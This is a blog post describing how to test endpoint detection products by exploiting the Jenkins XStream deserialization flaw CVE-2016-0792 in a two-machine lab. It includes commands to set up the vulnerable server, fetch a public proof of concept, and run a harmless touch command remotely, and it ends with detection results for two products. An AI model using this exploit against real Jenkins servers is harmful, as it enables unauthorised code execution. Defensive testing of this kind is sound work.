Exploit Jenkins Deserialization CVE-2016-0792 to Test Endpoint Detection Response

March 18, 2022

Testing Endpoint Detection Response Products

This is the first of many posts on how to test your Endpoint Detection Response product by using real world scenarios.

Products that are being tested

I am testing two products today:

Jenkins Exploit Information (CVE-2016-0792)

CVE-2016-0792 refers to a vulnerability in Jenkins (continuous integration tool) before versions 1.650 and LTS before 1.642.2 and allows remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.

Setting up your Environment

I will be covering a two machine scenario (victim and attacker). The victim machine will have the vulnerable version of Jenkins and the attacker machine will be running the exploit.

Victim Machine Setup

I chose to use an Amazon Web Services EC2 instance type t2.medium and Ubuntu 18.04 LTS (ami-0e472ba40eb589f49).

# Environment Setup for CVE-2016-0792 # # Multiple unspecified API endpoints in Jenkins # before 1.650 and LTS before 1.642.2 allow remote authenticated users to # execute arbitrary code via serialized data in an XML file, # related to XStream and groovy.util.Expando. # # O/S: Ubuntu 18.04 # Jenkins Version 1.609.3 # Known Exploit # From Host (vulnerable machine) # # Prerequisite packages # Download Java 7 JDK curl -L -O -k https://files-cdn.liferay.com/mirrors/download.oracle.com/otn-pub/java/jdk/7u80-b15/jdk-7u80-linux-x64.rpm # convert rpm to deb apt-get install alien netcat developer-tools sudo alien --scripts jdk-7u80-linux-x64.rpm # install java 7 deb dpkg -i jdk_1.7.080-1_amd64.deb # Create Jenkins User useradd jenkins mkdir /home/jenkins mkdir /opt/jenkins chown -R jenkins:jenkins /home/jenkins mkhomedir_helper jenkins # Download and run Jenkins cd /opt/jenkins curl -L -k -O https://get.jenkins.io/war-stable/1.609.3/jenkins.war java -jar jenkins.war
Code language: PHP (php)

Attacker Machine

I am using MacOS Montery but any machine with Python3 will work

Download Exploit

The proof of concept code was found on github and was written by jpiechowka.

pip3 install requests git clone https://github.com/jpiechowka/jenkins-cve-2016-0792 cd jenkins-cve-2016-0792
Code language: PHP (php)

Use Exploit

You will need to replace <serverip> with the IP address of server you are trying to exploit

This example touches a file located at /tmp/file_write. The exploit proof of concept code has an issue with special characters so my example will not use them. The command below (touch) works fine and proves that we have code execution.

python3 from exploit import exploit exploit('http://<serverip>:8080/', '/usr/bin/touch /tmp/file_write')
Code language: JavaScript (javascript)
Successful exploit of CVE-2016-0792

Endpoint Detection

Configuration

Each product tested was configured with the highest possible settings for detection.

Response Testings Results

Prisma Cloud Host Defender

Did not detect or alert

Palo Alto XDR Linux Host Agent

Detected a “Suspicious Input Deserialization” event